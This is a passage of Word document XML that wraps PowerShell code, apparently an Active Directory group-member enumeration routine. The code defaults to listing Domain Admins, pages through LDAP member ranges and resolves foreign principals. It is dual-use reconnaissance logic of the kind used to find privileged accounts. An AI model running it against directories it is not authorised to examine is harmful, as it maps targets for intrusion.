        <w:t xml:space="preserve">                    $Members = $GroupSearcher.FindAll()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C5AE90" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $GroupFoundName = $GroupName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC6BF5B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A7AEE5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79ED60CD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    Write-Error "Unable to find Group"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A7A1F8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FD6690" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B545004" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8EA203" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if ($GroupName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EA30F8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $GroupSearcher.filter = "(&amp;(objectCategory=group)(samaccountname=$GroupName)$Filter)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516578E1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDB20F6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                elseif ($SID) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8C534F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $GroupSearcher.filter = "(&amp;(objectCategory=group)(objectSID=$SID)$Filter)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B64E4A6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A4A42B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3B0D17" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    # default to domain admins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777214C7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $SID = (Get-DomainSID -Domain $TargetDomain -DomainController $TargetDomainController) + "-512"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9405EF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $GroupSearcher.filter = "(&amp;(objectCategory=group)(objectSID=$SID)$Filter)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB4948A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB34F92" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="33005AEC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FACE322" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Result = $GroupSearcher.FindOne()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16924933" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050EE5B3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278EB209" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Members = @()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2850CAFA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E87AC24" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="75E3BA51" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $GroupFoundName = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6F9C14" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="20C37F6A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if ($Result) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FBB850" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Members = $Result.properties.item("member")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DA8E63" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="38951DB8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    if($Members.count -eq 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA1E6B3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1D1C3D1E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $Finished = $False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F616470" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $Bottom = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365713E6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $Top = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A33805" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="21A8ED03" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        while(!$Finished) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689953B8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $Top = $Bottom + 1499</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2DAC8F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $MemberRange="member;range=$Bottom-$Top"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C41C74F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $Bottom += 1500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428807FA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A6D955" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $GroupSearcher.PropertiesToLoad.Clear()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EC9813" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            [void]$GroupSearcher.PropertiesToLoad.Add("$MemberRange")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D92F707" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            [void]$GroupSearcher.PropertiesToLoad.Add("samaccountname")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1BB77D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345AF820" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                $Result = $GroupSearcher.FindOne()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EDA291" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                $RangedProperty = $Result.Properties.PropertyNames -like "member;range=*"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57825E54" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                $Members += $Result.Properties.item($RangedProperty)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F69AB8F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                $GroupFoundName = $Result.properties.item("samaccountname")[0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E76E21" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7078D861" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                if ($Members.count -eq 0) { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6711ECC2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    $Finished = $True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B4C17E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726FD1A4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CA7CBC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            catch [System.Management.Automation.MethodInvocationException] {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61201163" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                $Finished = $True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2647DBAF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC37E73" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD6CC42" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E66C895" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3829D658" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                        $GroupFoundName = $Result.properties.item("samaccountname")[0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3810BC1F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $Members += $Result.Properties.item($RangedProperty)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750DB60B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0DBA76" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB6FB16" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $GroupSearcher.dispose()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CB5A00" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45489821" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0D00F392" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Members | Where-Object {$_} | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788CE9C0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # if we're doing the LDAP_MATCHING_RULE_IN_CHAIN recursion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F0500D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if ($Recurse -and $UseMatchingRule) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3BF2BE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Properties = $_.Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDC2BB4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                } </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35857993" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C95C66E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    if($TargetDomainController) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EA557B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $Result = [adsi]"LDAP://$TargetDomainController/$_"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DE429F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AEC02D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400F6633" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $Result = [adsi]"LDAP://$_"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D08314" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4153DB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    if($Result){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483ADE3C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $Properties = $Result.Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156C904C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E867B0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDE87A0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6A060A46" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if($Properties) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C4FC45" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="140E9891" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $IsGroup = @('268435456','268435457','536870912','536870913') -contains $Properties.samaccounttype</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFFC0AE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="048F8A10" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    if ($FullData) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B039CB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $GroupMember = Convert-LDAPProperty -Properties $Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A5DA24" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AE7629" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F7EFFD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $GroupMember = New-Object PSObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BEA8BB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175BF676" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3E0ACF54" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $GroupMember | Add-Member Noteproperty 'GroupDomain' $TargetDomain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC0A7C7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $GroupMember | Add-Member Noteproperty 'GroupName' $GroupFoundName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF14419" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2ECE65E0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    if($Properties.objectSid) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F270057" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $MemberSID = ((New-Object System.Security.Principal.SecurityIdentifier $Properties.objectSid[0],0).Value)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5644EBC3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D156FBB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6C353F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $MemberSID = $Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14438356" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D123EB9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3FFD4029" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71932F98" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $MemberDN = $Properties.distinguishedname[0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3695DE18" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2E760C92" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        if (($MemberDN -match 'ForeignSecurityPrincipals') -and ($MemberDN -match 'S-1-5-21')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CD0C51" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325E39A5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                if(-not $MemberSID) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D64DF3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    $MemberSID = $Properties.cn[0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F796069" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E745CA8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                $MemberSimpleName = Convert-SidToName -SID $MemberSID | Convert-ADName -InputType 'NT4' -OutputType 'Simple'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311381EF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                if($MemberSimpleName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546C6CB0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                    $MemberDomain = $MemberSimpleName.Split('@')[1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9284FC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3604AAB6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C15E8EC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    Write-Warning "Error converting $MemberDN"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9599A7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    $MemberDomain = $Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49344F25" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CD101C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F001ED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1986AF67" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                Write-Warning "Error converting $MemberDN"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F03AEC6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                $MemberDomain = $Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B54D027" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
